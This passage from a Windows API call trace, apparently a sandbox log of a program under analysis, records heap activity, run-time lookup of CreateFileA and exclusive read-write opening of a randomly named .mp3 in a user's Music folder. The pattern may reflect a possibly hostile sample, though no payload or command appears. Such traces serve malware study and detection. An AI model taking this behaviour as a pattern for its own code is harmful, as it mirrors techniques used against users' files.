Flags=0x0, Size=0x10) returned 0x9bda68 [0181.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.609] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0181.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda68 [0181.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0181.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.610] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0181.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0181.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0181.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.610] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0181.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0181.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0181.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0181.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3", cchWideChar=88, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 88 [0181.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58) returned 0x8c4a48 [0181.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3", cchWideChar=88, lpMultiByteStr=0x8c4a48, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3", lpUsedDefaultChar=0x0) returned 88 [0181.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0181.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.613] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\axe49w4a sjdn r.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0181.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0181.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=88, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0181.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=88, lpWideCharStr=0x8e6d90, cchWideChar=88 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3") returned 88 [0181.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0181.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0181.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0181.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0181.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0181.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0181.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0181.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0181.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0181.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0181.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0181.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0181.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0181.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0181.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.617] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0181.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0181.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.619] RtlAllocateHeap (HeapHandle=0x8a0000, 